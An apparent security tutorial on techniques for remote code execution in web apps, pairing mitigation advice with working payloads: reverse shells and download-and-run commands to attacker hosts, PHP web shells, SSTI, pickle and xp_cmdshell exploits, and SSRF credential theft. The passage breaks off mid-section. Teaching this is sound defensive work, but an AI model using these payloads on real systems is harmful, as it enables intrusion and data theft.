
Top 10 Ways to Achieve Remote Code Execution (RCE) on Web Applications

35 min read · Jul 1, 2025


Remote Code Execution (RCE) is a severe security vulnerability that allows attackers to run arbitrary code on a target server over a network. In practice, an RCE typically means a full compromise of the application and often the hosting system, leading to data theft, service disruption, or even deployment of malware or ransomware. For penetration testers, red teamers, and bug bounty hunters, discovering an RCE is like finding gold: it's high-impact and often comes with a big reward. This article covers the top 10 general techniques (not specific CVEs) to achieve RCE on web applications. Each section provides an explanation, a practical example (with a Python-oriented lens where appropriate), common tools/commands for exploitation, and mitigation advice. Let's dive in!

1. OS Command Injection (Shell Injection)

Explanation: OS command injection occurs when an application takes untrusted user input and inserts it into a system command (shell command) without proper sanitization. This allows an attacker to break out of the intended command context and execute arbitrary commands on the server's operating system. In effect, the attacker "injects" additional shell instructions alongside the application's legitimate command. Successful command injection often leads to full compromise of the application and potentially the host, since arbitrary system commands (like creating files, adding users, or installing malware) can be executed with the privileges of the web server process.

Example scenario: Consider a web app that provides a network diagnostic feature, where a user supplies an IP address and the backend runs a ping command. The vulnerable code (in Python) might look like:

import os
ip = request.GET.get('ip')  # unsanitized user input
os.system(f"ping -c 1 {ip}")  # input is interpolated straight into a shell command

If an attacker submits 127.0.0.1; whoami, the os.system call will execute ping -c 1 127.0.0.1; whoami. The semicolon (;) ends the ping command and executes the whoami command, printing the server’s user name. In a URL, this attack could be delivered as:

http://target.app/diag?ip=127.0.0.1; whoami

This would make the server run the whoami command (or any other injected command) in addition to the ping. Attackers often use command separators like &, &&, | or ; to chain commands in this way.

Tools & Techniques: To discover command injection, testers commonly try adding special characters (; | & &&) in HTTP parameters via a proxy like Burp Suite or with curl. For example, using curl:

curl "http://target.app/search?query=test; ls -la"

If the response includes a directory listing, it’s a sign of command execution. Blind command injection (no direct output) can be detected by timing attacks (e.g., ; sleep 5) or using nslookup/curl to trigger DNS callbacks. Automated scanners (like Burp Intruder or sqlmap with --os-cmd option) can fuzz parameters with payloads. After discovering injection, tools like Netcat (for reverse shells) or custom Python scripts can be used to establish a shell. For instance, an attacker might inject nc -e /bin/sh attacker.com 4444 (on Linux) to get a reverse shell. Metasploit also provides modules for exploiting command injection once identified.
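The timing heuristic described above (e.g., injecting ; sleep 5) can be sketched as a small helper. This is a minimal illustration, not a finished scanner; send_request is a hypothetical caller-supplied hook that issues the actual HTTP request with the payload injected into the suspect parameter:

```python
import time

def looks_time_blind(send_request, delay=5, threshold=None):
    """Compare a baseline request against one carrying a sleep payload.

    send_request(payload) is a hypothetical callable that sends the HTTP
    request with `payload` placed in the parameter under test.
    """
    threshold = threshold if threshold is not None else delay * 0.8

    start = time.monotonic()
    send_request("127.0.0.1")                    # baseline request
    baseline = time.monotonic() - start

    start = time.monotonic()
    send_request(f"127.0.0.1; sleep {delay}")    # injected delay
    injected = time.monotonic() - start

    # A gap close to the injected delay suggests the sleep ran server-side
    return (injected - baseline) >= threshold
```

Repeating the probe a few times with different delays reduces false positives from ordinary network jitter.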

Mitigation: Developers should never directly concatenate user input into OS commands. Use high-level language functions or libraries to perform the needed action instead (e.g., use Python’s DNS libraries instead of calling the nslookup command). If calling OS commands is necessary, use safe APIs that allow parameterization (for example, use subprocess.run([...], check=True) with a list of arguments in Python, which avoids shell interpretation). Enforce strict input validation (whitelisting acceptable characters) for any input that must be part of a shell command. Implement least privilege for the application process (so that even if command injection occurs, the impact is limited). Finally, use monitoring to detect unusual system calls. Proper input sanitization and using non-shell system interfaces will prevent command injection vulnerabilities.
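The subprocess.run advice above can be made concrete. A minimal sketch: passing an argument list (and never shell=True) means the user's string reaches the program as a single argument, so shell metacharacters stay inert:

```python
import subprocess

def safe_ping(ip: str) -> str:
    # The list form hands `ip` to ping as one argv entry; ';', '|', and
    # '&&' are never seen by a shell, so they cannot chain commands.
    result = subprocess.run(
        ["ping", "-c", "1", ip],
        capture_output=True, text=True, timeout=10,
    )
    return result.stdout

# The effect is easy to see with echo standing in for ping:
out = subprocess.run(
    ["echo", "127.0.0.1; whoami"], capture_output=True, text=True
).stdout
# out contains the literal text "127.0.0.1; whoami" -- whoami never ran
```

Combined with input validation (e.g., checking the value parses as an IP address), this closes the injection vector at the API level rather than by pattern-matching.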

2. Malicious File Uploads

Explanation: Many web applications allow users to upload files (profile pictures, documents, etc.). If the file upload feature is insecure, an attacker can upload a malicious script or executable to the server and then execute it, achieving RCE. Common scenarios include uploading a web shell (e.g., a .php file on a PHP server) or an agent (like an .aspx page on ASP.NET) when the application fails to validate file type or content. The server then stores the file in a web-accessible directory, and the attacker accesses it via HTTP to execute their payload. This effectively turns the application into a dropzone for attacker-supplied code.

Example of a web shell (the popular R57 PHP shell) that an attacker could upload to a vulnerable server. Once uploaded, the attacker can issue arbitrary commands through this backdoor interface.

Example scenario: A classic example is uploading a PHP web shell. Suppose a vulnerable PHP site lets users upload images but doesn’t enforce file type checking. An attacker can upload a file named shell.php with the content:

<?php system($_GET['cmd']); ?>

If the file gets saved to, say, https://4node.ai/uploads/shell.php, the attacker can then send requests like:

http://4node.ai/uploads/shell.php?cmd=whoami

This will execute the whoami command on the server and return the output. Similarly, the attacker could run cmd=uname -a to get system info, or even cmd=curl http://evil.com/malware.sh | bash to download and execute a larger payload. Another example is uploading an ASP.NET shell (shell.aspx) or a Node.js reverse shell file, depending on the server technology. The key is that the server stores and executes the uploaded code.

Tools & Techniques: To exploit file upload flaws, attackers often use intercepting proxies (Burp Suite/ZAP) to modify file upload requests (e.g., change filename or MIME type). A simple and reliable approach is using cURL:

curl -F "file=@shell.php" -F "submit=Upload" http://target.app/upload

The -F flag simulates a file form upload. After uploading, the attacker tries to access the file's URL. Common tools like OWASP ZAP's fuzzing or Burp Intruder can probe for which file extensions are allowed (e.g., try uploading .php, .jsp, .jpg with embedded PHP, etc.). Some advanced techniques include uploading polyglot files (files valid in two formats, e.g., an image that contains a PHP payload in its metadata) to bypass filters. For post-exploitation, attackers often use ready-made web shells (like the R57 shell shown above, or C99 shell) or tools like Weevely (a stealth PHP web shell) to conveniently execute commands on the server. Once the shell is up, they can run OS commands, browse files, or pivot to deeper network access.

Mitigation: Secure file upload functionality is critical. Validate file types and content: enforce allowed extensions (e.g., only .png, .jpg for images) and verify file headers or magic numbers to ensure it’s genuinely an image/pdf/etc. Rename uploaded files to remove any executable suffix (e.g., always store user files with a .txt or random extension or no extension at all). Store uploads in a directory not served by the webserver or with execution permissions turned off. For example, on an Apache/PHP app, configure the upload directory with php_flag engine off so that PHP files won’t execute even if uploaded. Use libraries to sanitize filenames and reject any that contain path traversal (../) sequences. Additionally, implement virus/malware scanning on uploaded files. As a defense-in-depth, the web server should be configured to disallow script execution in upload directories. By strictly controlling what can be uploaded and never executing unvalidated content, you can prevent malicious file upload exploits.
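The magic-number check recommended above can be sketched in a few lines of Python. This is a minimal illustration covering only PNG and JPEG; the signature table is an assumption to be extended per deployment:

```python
# Known leading-byte signatures (magic numbers) for the allowed image types.
# Extend this table per deployment (hypothetical minimal set shown here).
ALLOWED_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
}

def looks_like_allowed_image(data: bytes) -> bool:
    """Reject anything whose leading bytes don't match an allowed format."""
    return any(data.startswith(sig) for sig in ALLOWED_SIGNATURES.values())
```

Note that a polyglot file can still pass a signature check on its own, which is why the article also recommends renaming uploads and disabling script execution in the upload directory as defense-in-depth.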

3. Local and Remote File Inclusion (LFI/RFI)

Explanation: File inclusion vulnerabilities allow an attacker to trick the web application into including or executing unintended files. In Local File Inclusion (LFI), the application might expose the contents of files on the server’s local filesystem. In Remote File Inclusion (RFI), the application accepts a URL to a remote resource and includes it, allowing the attacker to fetch and execute code from an external site. Both LFI and RFI often arise in languages like PHP, where functions like include() or require() take a filename. If user input is concatenated into these file paths without validation, attackers can supply path traversal patterns (../../etc/passwd) or full URLs. LFI mainly leads to information disclosure (reading sensitive files), but it can be escalated to RCE if the attacker can inject code into a file that gets included. RFI is more directly dangerous as it can pull malicious code from the attacker’s server for execution, leading to immediate RCE and a “site takeover”.

Conceptual flow of a Remote File Inclusion attack. The attacker’s input points the application to a malicious script hosted on an external server, which gets included and executed on the target web server.

Example scenario: For LFI, imagine a PHP site that loads page content via a URL parameter: page.php?file=home. The code might do: include($_GET['file'] . ".php");. An attacker can manipulate the file parameter to read arbitrary files, e.g.:

http://target.app/page.php?file=../../../../etc/passwd

This would include /etc/passwd (if the ../../ traversal is not blocked), dumping the content of the server’s password file. However, LFI by itself just reads files. To achieve RCE, attackers use tricks like log poisoning or PHP wrappers. For instance, if the app logs user agent strings to a file and then includes that file, an attacker can set their User-Agent to <?php system($_GET['cmd']); ?> and then include the access log via LFI, thus executing the injected PHP code. Another LFI-to-RCE trick on PHP is including special files like /proc/self/environ which may contain attacker-controlled data (like an injected environment variable). RFI is more straightforward: if the app does include($_GET['url']); and the configuration allows remote URLs, an attacker supplies a URL to a malicious script:

http://target.app/page.php?url=http://evil.com/webshell.txt

The application will fetch and execute webshell.txt (which might contain something like <?php exec($_GET['cmd']); ?>), immediately yielding RCE. Note: Modern PHP usually has allow_url_include disabled by default, making pure RFI less common, but many historical exploits (and some misconfigured servers) are vulnerable to it. Other languages or frameworks might have similar inclusion flaws.

Tools & Techniques: Detecting LFI involves testing parameters for path traversal. Burp Suite or OWASP ZAP can be used with fuzz lists (e.g., ../../etc/passwd, ../../../../../../etc/passwd%00 etc.) to see if sensitive file content is returned. Curl is handy for quick checks:

curl "http://target/page.php?file=../../etc/passwd"

If you see the root:x:0:0: etc., you have LFI. For RFI, an attacker might set up a netcat listener or simple HTTP server to serve a payload and detect if the target includes it. Tools like Commix or DotDotPwn can automate LFI/RFI discovery. Once an LFI is found, LFI to RCE often requires creativity: the attacker might upload a file (via another functionality) and then include it via LFI, or exploit an LFI in combination with file upload. There are also LFI exploitation tools and cheat-sheets (for example, lists of common files to attempt to include, or scripts that attempt various encoding/bypass tricks). In practice, many bug hunters will systematically try to include /etc/passwd or Windows \windows\win.ini to test LFI, and use Burp Collaborator or monitoring on their server to detect RFI inclusion attempts.

Mitigation: To prevent file inclusion vulnerabilities, never use user input directly in file include or file path functions. If you need to include dynamic content, maintain a safe mapping of allowed file names (e.g., if ?file=about then map to an internal whitelist of files). Disable remote URL includes in server settings (e.g., ensure allow_url_include is off in PHP). Normalize and validate file path inputs to eliminate .. traversal; for example, reject any input containing ../ or that resolves to a path outside the intended directory. Use chroot or containerization so the app cannot access system files even if an include is abused. In general, white-list permissible files or use indirect references (like an ID that the application maps to a file path). Also, set proper file permissions: the web app user should not have permission to read sensitive system files or write to web directories. By confining what files can be accessed, you effectively neutralize LFI/RFI vulnerabilities.
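The safe-mapping idea above can be sketched as follows. A minimal illustration with hypothetical page names and paths: the client only ever supplies a key, and anything outside the allowlist falls back to a default:

```python
# Indirect references: the client supplies a key, never a filesystem path.
# Keys and paths below are hypothetical examples.
PAGE_MAP = {
    "home": "templates/home.php",
    "about": "templates/about.php",
}

def resolve_page(requested: str) -> str:
    # Unknown keys (including ../../etc/passwd or full URLs) never reach
    # the filesystem; they fall back to the default page instead.
    return PAGE_MAP.get(requested, PAGE_MAP["home"])
```

Because the attacker's input is only ever used as a dictionary key, traversal sequences and remote URLs are structurally inert.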

4. Insecure Deserialization

Explanation: Insecure deserialization is a vulnerability that occurs when a web application deserializes data from an untrusted source without proper validation. Serialization is converting an object into a format (binary, JSON, etc.) for storage or transmission, and deserialization is reconstructing the object from that data. If an attacker can tamper with serialized data (for example, a session token, cookie, or hidden form field) and the application later deserializes it unsafely, the attacker can craft the data to include malicious content that, during deserialization, triggers code execution. Many programming languages support advanced serialization features (like magic methods, object inheritance, etc.) that can be abused. For instance, in PHP the __wakeup or __destruct methods of objects may execute during deserialization; in Python, the __reduce__ or __reduce_ex__ method can dictate how an object is reconstructed (and can be made to execute arbitrary code); in Java and .NET, entire gadget chains (a series of object method calls) can be executed if a vulnerable class is deserialized. The result is often a remote code execution on the server in the context of the application.

Example scenario: A simple illustration in Python: suppose a web app uses pickle to serialize user session data (not a good practice, but it happens). The server expects a pickled object from the client and does pickle.loads(user_provided_data) to restore it. An attacker can create a malicious pickle that, when deserialized, executes OS commands. For example, using Python one can define a class with a __reduce__ method that returns a tuple like (os.system, ("touch /tmp/pwned",)). When this object is pickle-deserialized on the server, it will execute os.system("touch /tmp/pwned"), creating the file /tmp/pwned. In Java, a real-world example was the exploitation of Apache Commons Collections library: attackers could send a serialized object that, when deserialized, invoked a chain of methods leading to Runtime.getRuntime().exec(), thereby running a shell command on the server. Consider an application that stores user profile objects in a hidden form field as a serialized blob; an attacker could modify that blob (changing class names or values) to include a payload. When the server deserializes it, it might execute the payload and yield a shell. A notorious instance was the Java Deserialization RCE in Jenkins (CVE-2017-1000353), where sending a crafted serialized object to the Jenkins CLI endpoint resulted in arbitrary code execution on the server – without needing to log in. In PHP, an example is an app that uses unserialize() on user cookie data: by changing the cookie to include a malicious object (maybe using a known POP chain), the attacker gets RCE on unserialization.
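The __reduce__ trick described above can be demonstrated locally in a few lines. This is a self-contained educational sketch (using a temp-directory path as a stand-in for /tmp/pwned); it shows that merely calling pickle.loads on attacker-controlled bytes runs a command:

```python
import os
import pickle
import tempfile

# Stand-in for the /tmp/pwned marker from the scenario above
marker = os.path.join(tempfile.gettempdir(), "pwned")

class Exploit:
    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call os.system(cmd)".
        # Deserialization itself becomes command execution.
        return (os.system, (f"touch {marker}",))

payload = pickle.dumps(Exploit())   # what an attacker would craft and send
pickle.loads(payload)               # what a vulnerable server would do
# The marker file now exists: arbitrary command execution on load
```

No method of Exploit is ever called explicitly; the pickle protocol itself invokes the reconstruction callable, which is why pickle.loads on untrusted input is unsafe by design.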

Tools & Techniques: Insecure deserialization can be tricky to detect. Testers look for clues like serialized data structures in requests (e.g., strings like O:8:"SomeClass":... in PHP, or base64-encoded blobs that decode to serialized objects). When a suspect serialization is found, one approach is to use or modify known exploit payloads. Popular tools include ysoserial (for Java) and ysoserial.net (for .NET), which generate malicious serialized objects for various gadget chains. For example, using ysoserial one might generate a payload for Commons Collections that opens a calc or connects back to a shell. In Python, an attacker can create a custom pickle (as illustrated) or use libraries to create malicious YAML/JSON if the deserializer is vulnerable (e.g., Python yaml.load with untrusted input is essentially code execution). During testing, pen testers might also use Burp Suite extensions to automatically detect deserialization (some extensions attempt to insert benign objects to see if errors occur). If source code is available, they look for usage of unserialize, ObjectInputStream, pickle.loads, etc. Once a vulnerability is confirmed, exploitation often requires crafting the right object sequence. There are cheat sheets and gadget chain libraries available for this. For instance, frohoff's ysoserial payloads for Java, or community lists of PHP gadget chains (for common CMS platforms). The exploitation process may involve trial and error with different gadgets. Tools like Java Serial Killer or marshalsec can also aid in identifying classes on the classpath that could be abused. In summary, exploiting deserialization is an advanced technique requiring specialized payloads and tools, but the payoff is direct RCE.

Mitigation: The safest way to avoid this entire class of issues is to never deserialize data from an untrusted source. If you need to persist user data, use safer formats like JSON or XML and strictly validate the content (though these too can be abused if you eval the data, so treat all input with skepticism). If binary serialization is required, implement integrity checks: for example, sign the serialized data or include an HMAC so that tampering is detectable. Many frameworks allow configuring allowed classes for deserialization — use allowlists to restrict which types can be deserialized and block the rest. For Java, libraries like SerialKiller or the built-in ObjectInputFilter in newer Java can prevent unknown classes from being deserialized. Run deserialization in a low-privilege, isolated context if possible (e.g., in a sandbox or separate process). Monitor for exceptions or anomalies during deserialization; often, exploitation attempts might throw errors that can be logged (alert on those). Keep your libraries updated, since many deserialization RCE vectors (like those in Apache Commons, Jackson, etc.) are known and patched in later versions. Finally, consider using simpler data formats: if you can switch from native serialization to a more straightforward format (and parse it safely), do so. These steps help ensure that even if an attacker modifies serialized data, they cannot leverage it for code execution.
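The sign-or-HMAC recommendation above can be sketched with the standard library. A minimal illustration (SECRET is a placeholder; a real key must live outside source control): the server signs blobs before handing them to the client and refuses any blob whose tag no longer matches:

```python
import hmac
import hashlib

SECRET = b"server-side-secret-key"  # placeholder; load from a secret store

def sign(blob: bytes) -> bytes:
    """Prefix the serialized blob with an HMAC-SHA256 tag."""
    tag = hmac.new(SECRET, blob, hashlib.sha256).hexdigest().encode()
    return tag + b"." + blob

def verify(signed: bytes) -> bytes:
    """Return the blob only if its tag is intact; raise on tampering."""
    tag, _, blob = signed.partition(b".")
    expected = hmac.new(SECRET, blob, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("serialized blob was tampered with")
    return blob
```

hmac.compare_digest is used instead of == to avoid timing side channels. The key point: deserialization only ever happens after verify succeeds, so a tampered payload is rejected before it can trigger any gadget.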

5. Server-Side Template Injection (SSTI)

Explanation: Server-Side Template Injection occurs when user input is unsafely embedded into a server-side template, leading to arbitrary code execution on the server. Modern web applications often use template engines (like Jinja2 in Python, Twig in PHP, Freemarker or Thymeleaf in Java, Razor in .NET, etc.) to render dynamic HTML. If the template engine is used improperly — for example, directly including user-supplied strings in the template without filtering — an attacker can inject template directives. Template engines are essentially code interpreters, so an injection can allow execution of server-side code (often in the template’s host language). SSTI vulnerabilities often result in full RCE because template engines usually have capabilities to call functions, access files, or execute shell commands. The classic example is from the research “Server-Side Template Injection: RCE for the modern web app” which introduced this attack vector.

https://portswigger.net/web-security/server-side-template-injection

Example scenario: Consider a Python Flask application using Jinja2 for templating. Suppose it has code like:

from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/hello')
def hello():
    name = request.args.get('name', '')
    template = f"Hello {name}"  # user input becomes part of the template itself
    return render_template_string(template)

This looks innocent, but if an attacker passes name={{7*7}}, the template becomes Hello {{7*7}}. Jinja2 will evaluate {{7*7}} and output Hello 49. This confirms injection. That alone is just math, but attackers can escalate: Jinja2 (and many engines) allow accessing internals of the language. A notorious Jinja2 payload for RCE is:

{{''.__class__.mro()[1].__subclasses__()[CLASS]('uname -a', shell=True, stdout=-1).communicate()}}

This payload leverages Jinja2's ability to navigate Python's object model. Here, ''.__class__.mro()[1].__subclasses__() finds all classes, and by picking the right index for the subprocess.Popen class (denoted by the CLASS placeholder), it calls it to execute a shell command (uname -a in this case). The output would be captured and inserted into the template response. In practice, an attacker would trial class indices or use shorter payloads if possible. Different template engines have different syntax: e.g., in Ruby ERB, <%= `ls` %> could execute ls; in Twig (PHP), one could use {{ system('id') }} if the sandbox is disabled; in .NET Razor, injection is less trivial but potentially possible via C# code. Essentially, if you see your input reflected in a template evaluation context (especially inside {{ }} or similar), you might have SSTI, which can often be escalated to run code on the server.
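The object-model walk that the Jinja2 payload relies on can be reproduced in a local Python shell. A sketch that locates subprocess.Popen among object's subclasses and calls it without any import statement appearing in the "template" context (the index varies between interpreters, which is why attackers trial it):

```python
import subprocess  # ensures Popen is loaded so it appears in the subclass list

# Same walk as the payload: str -> object -> every loaded subclass of object
subclasses = ''.__class__.mro()[1].__subclasses__()

# Find the index the payload's CLASS placeholder stands for
idx = next(i for i, cls in enumerate(subclasses)
           if cls.__name__ == "Popen")

# subclasses[idx] is subprocess.Popen, reached purely via attribute access --
# exactly what the Jinja2 payload abuses (stdout=-1 is subprocess.PIPE)
proc = subclasses[idx](["echo", "ssti"], stdout=-1)
output = proc.communicate()[0]
```

Running this locally against the same interpreter version as the target is a common way to pre-compute a working CLASS index before firing the real payload.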

Tools & Techniques: To find SSTI, testers will inject template expressions specific to various engines and look for either execution or errors. For example, they might try payloads like {{7*7}}, ${{7*7}}, <%=7*7%> in user inputs and see if the output is 49 or if an error message hints at a template engine. Using curl for quick testing (as shown above with the Flask example) or Burp to automate multiple payloads is common. There’s a useful Burp extension called Backslash Powered Scanner which injects a wide range of SSTI probes and analyzes responses. Another tool is Tplmap, which automates exploitation of SSTI once discovered. It can identify the template engine and often drop into an interactive shell or run commands through the template. Once the engine is identified (Jinja2, Freemarker, etc.), attackers tailor their payloads to that engine’s features. They might use publicly known gadgets; for instance, Jinja2 has the cycler or joiner technique as alternatives to the one shown, and Java’s Freemarker can call freemarker.template.utility.Execute to run commands. IDE debugging or REPL can also help craft payloads: an attacker might replicate the template environment locally (install the same template engine) and experiment with inputs to achieve code execution. In summary, finding SSTI is about injecting likely template syntax and observing behavior, and exploiting it is about invoking the engine’s functions or underlying language to run OS commands.

Mitigation: The primary defense against SSTI is not to mix untrusted input with templates in an unsafe way. Treat templates like code (because they are) — never directly inject user-provided strings into templates. Use the templating engine’s built-in escaping or filtering functions. For example, Jinja2 has auto-escaping (especially if used with Flask properly), and you should avoid using render_template_string on raw input as in the example. If dynamic template rendering is needed, consider a safe subset or sandbox for user content. Some template engines offer sandbox modes (e.g., Jinja2 sandbox), but be cautious, sandboxes have had escapes before. Validate and sanitize any user inputs that might go into templates: if the input is just a name to greet, ensure it’s plain text (no braces or code). Use allowlists for expected content or patterns. Additionally, keep template engines updated, as some have patched certain risky functionality. Essentially, treat user-supplied template data as potentially malicious code – because SSTI shows it can become exactly that. By separating data and logic in templates and avoiding unsafe APIs, you can prevent SSTI. Web application firewalls (WAFs) may catch some SSTI patterns (e.g., {{ sequences), but do not rely solely on that – fixing the code is the surest mitigation.
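One way to keep data and logic separate can be sketched with the standard library's string.Template, which substitutes values but never evaluates expressions. This is an illustration of the principle, not a drop-in replacement for a full template engine (with Jinja2 itself, the analogous fix is passing the value as a context variable rather than building the template string from input):

```python
from string import Template

def greet(name: str) -> str:
    # `name` is substituted as plain text; template syntax inside it
    # is never evaluated, so {{7*7}} stays literal instead of becoming 49.
    return Template("Hello $name").substitute(name=name)
```

With this approach the SSTI probe from the Flask example is inert: greet("{{7*7}}") returns the literal string rather than evaluating the expression.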

6. SQL Injection Leading to RCE

Explanation: SQL Injection (SQLi) is a well-known vulnerability where an attacker can manipulate a backend SQL query by injecting malicious SQL segments. While SQLi typically allows extraction or modification of data, certain databases offer ways to execute system commands, effectively turning a SQLi into an RCE. In other words, if an attacker can run SQL on the server, under some circumstances they can escalate that to running OS commands. This depends on the database and its configuration. For example, Microsoft SQL Server has the stored procedure xp_cmdshell which (if enabled and the user has sufficient privileges) allows execution of operating system commands. Other databases have similar features: Oracle has external procedure calls, PostgreSQL has user-defined functions or can call out to the underlying OS with extensions like COPY ... TO PROGRAM, and MySQL/MariaDB can be tricked (with FILE privileges) into writing files to the filesystem (which could be a webshell in the web directory). SQLi to RCE is basically using the database as a stepping stone to get code execution in the host environment.

Example scenario: Imagine an application with a typical SQLi: http://target.app/products?category=electronics' OR 1=1--. This dumps all products due to SQL injection. Now, the database is Microsoft SQL Server. The attacker, through the injectable parameter, can try:

'; EXEC xp_cmdshell 'whoami';--

This payload closes the current query and executes xp_cmdshell 'whoami', which if allowed, will run the whoami command on the database server’s OS. The result (the user account under which SQL Server is running) might be returned as part of the query results. From there, the attacker can run arbitrary commands (xp_cmdshell 'powershell -c ...' etc.). Another example: on MySQL, an attacker could use injection to write a malicious file. For instance, UNION SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/shell.php' (provided the database user has file write permissions). This drops a PHP shell on the server, which the attacker can then access via the web. PostgreSQL, if the user can create functions, might allow creating a function in C that spawns a shell – though that’s complex. There’s also the case of MySQL’s sys_exec() UDF or Microsoft’s Ole Automation procedures for spawning processes. The key scenario for SQLi-to-RCE is when the database has some stored procedure or feature to interact with the OS and the attacker can invoke it via SQL injection.

Tools & Techniques: Standard SQL injection tools like sqlmap can automate this process. In fact, sqlmap has options such as --os-shell and --os-pwn that attempt to leverage database features to drop a shell. For example, if sqlmap detects a MSSQL injection, it will try enabling xp_cmdshell if it’s disabled and then use it to open a remote shell for the attacker. Even without sqlmap, an attacker can use manual SQL clients or browser-based exploitation for simpler payloads. Using Burp Suite or curl to test SQL payloads (like adding '; EXEC xp_cmdshell 'ping attacker.com'--) can confirm if commands execute (for instance, by pinging back to an attacker-controlled host). For MySQL file writes, an attacker might not see output, but by checking if the file got created (maybe via LFI or direct web access) they confirm success. Attackers also use out-of-band channels: e.g., with MSSQL they might use xp_cmdshell to run powershell or bitsadmin to fetch a reverse shell binary from the internet and execute it, establishing a connection back. A variety of tools, including Metasploit, have modules for specific SQLi-to-RCE exploits (like Oracle Java procedure exploit, or MSSQL payloads). In summary, once SQL injection is found, the techniques to get RCE involve calling platform-specific functions. Knowledge of the target DBMS is crucial – for example, knowing that on Microsoft SQL you can try xp_cmdshell, on Oracle UTL_HTTP.request or external tables, etc. Often the attacker will first use SQLi to figure out database version and user privileges, then choose the method accordingly.

Mitigation: Preventing SQL injection is a fundamental part of secure development. Always use parameterized queries (prepared statements) for database operations; this ensures user input is treated as data, not executable SQL. By eliminating direct string concatenation of SQL commands, you close the door on injection entirely. Use ORMs or query builders that properly escape or parameterize inputs. Principle of least privilege: the database account used by the application should have the minimum rights it needs (for example, it probably does not need permission to execute system stored procedures like xp_cmdshell or write to arbitrary files). Disabling dangerous features: if using MSSQL, disable xp_cmdshell unless absolutely needed. On databases, consider revoking execute rights on sys procedures from web-user roles. Use web application firewalls or database firewalls to detect and block common SQL injection patterns (though not foolproof, they add a layer). Additionally, input validation and output encoding can help (for instance, validating that an expected numeric ID contains only digits). Regularly update and patch the DBMS, as some SQLi-to-RCE vectors rely on known issues or defaults. And of course, employ SAST/DAST tools to catch SQL injection in development and testing. The bottom line: preventing SQL injection in the first place prevents this RCE path entirely. Secure coding practices and least-privilege configurations are the cure.
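The parameterized-query advice can be illustrated with the standard library's sqlite3 module. A minimal sketch showing that the injection string from the example above is bound purely as data:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (name TEXT, category TEXT)")
conn.execute("INSERT INTO products VALUES ('TV', 'electronics')")
conn.execute("INSERT INTO products VALUES ('Desk', 'furniture')")

user_input = "electronics' OR 1=1--"   # the payload from the example above

# The ? placeholder binds user_input as a value, never as SQL text,
# so the quote and the OR clause cannot alter the query's structure.
rows = conn.execute(
    "SELECT name FROM products WHERE category = ?", (user_input,)
).fetchall()
# rows is empty: no row's category literally equals the injection string
```

The same pattern applies to every major driver (psycopg2, mysql-connector, pyodbc, etc.), only the placeholder style differs.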

7. Server-Side Request Forgery (SSRF) leading to RCE

Explanation: SSRF is a vulnerability where an attacker can make a target server perform HTTP requests to an arbitrary URL of the attacker’s choosing. Typically, SSRF is used to access internal services (since the web server might have access to internal network or cloud metadata that the attacker cannot directly reach). By itself, SSRF allows reading/writing data from the server’s perspective. However, certain SSRF scenarios can be escalated to remote code execution. This escalation usually happens in one of two ways: (1) the attacker finds an internal service that is vulnerable or by design allows code execution (for example, an internal API that runs commands, a misconfigured management interface, etc.), and SSRF is the gateway to reach it; or (2) SSRF is used to access cloud infrastructure metadata (like AWS/GCP/Azure instance metadata) or other sensitive endpoints to retrieve credentials or secrets, which the attacker then leverages to gain code execution elsewhere.

Example scenario (Internal service leverage): Suppose the target application is running in a cloud environment and has SSRF in a feature that fetches URLs (e.g., a PDF generation service that fetches HTML from a URL). The attacker uses SSRF to reach http://localhost:8080/admin – an internal admin panel not normally exposed. If that admin service has an API endpoint like http://localhost:8080/run?cmd= (for example, a development interface), the attacker can trigger it. Concretely, an attacker could send: http://main.app/report?url=http://localhost:8080/run?cmd=id. If the internal service executes the id command, its output might come back in the response. Even more powerfully, consider an internal Jenkins or Solr instance: SSRF to http://localhost:8080/jenkins/script could allow running Groovy scripts (RCE), or SSRF to a vulnerable Redis or MongoDB instance could sometimes be escalated. Another rising example is SSRF to headless browsers or PDF converters: these services might interpret HTML/JS. As mentioned in one case, if an SSRF can force an internal browser to load attacker-controlled HTML, the attacker could exploit a sandbox escape in the browser, leading to RCE on the server.

Example scenario (Exposing cloud credentials): The classic case is AWS EC2 instance metadata. If the application is running on AWS, a well-known SSRF target is http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME. By hitting this internal IP (which every AWS instance has for metadata), the attacker can grab temporary AWS credentials for the instance’s IAM role. These credentials might allow access to various AWS services. In the worst case (if the IAM role is high-privileged), the attacker can use them to spin up their own AWS instances, read S3 buckets, or even execute commands on the server via AWS APIs (for example, AWS Systems Manager’s RunCommand, or attaching a malicious policy to the instance). In simpler terms, with the credentials, an attacker can often remotely administer the cloud instances, effectively achieving RCE or broader account takeover. Another cloud example: Google Cloud’s metadata or Azure’s metadata, which similarly can leak tokens. Beyond cloud, sometimes SSRF can reach internal networks where there might be an API like http://internal-api/update?url=http://evil.com/payload that downloads and runs code, etc. The possibilities depend on what the internal network hosts; SSRF is the foot in the door.
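The two-step metadata chain described above can be sketched in Python. The `build_ssrf_url` helper and the `?url=` parameter name are assumptions about how the vulnerable fetch feature accepts input; the metadata paths are AWS's documented IMDSv1 endpoints:

```python
from urllib.parse import quote

# AWS instance metadata base path for IAM role credentials (IMDSv1).
METADATA = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def build_ssrf_url(vuln_endpoint: str, internal_url: str) -> str:
    """Embed an internal URL into the vulnerable fetch parameter."""
    return f"{vuln_endpoint}?url={quote(internal_url, safe='')}"

# Step 1: ask the metadata service which IAM role is attached.
step1 = build_ssrf_url("http://target.app/fetch", METADATA)

# Step 2: once the role name comes back, request its temporary keys.
role = "WebAppRole"  # hypothetical value returned by step 1
step2 = build_ssrf_url("http://target.app/fetch", METADATA + role)

print(step1)
print(step2)
```

The returned JSON (AccessKeyId, SecretAccessKey, Token) can then be loaded into the AWS CLI or Boto3, as described in the next section.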

Tools & Techniques: To find SSRF, testers usually try providing internal addresses as input where an external URL is expected. Using curl is straightforward:

curl "http://target.app/fetch?url=http://127.0.0.1:80/"

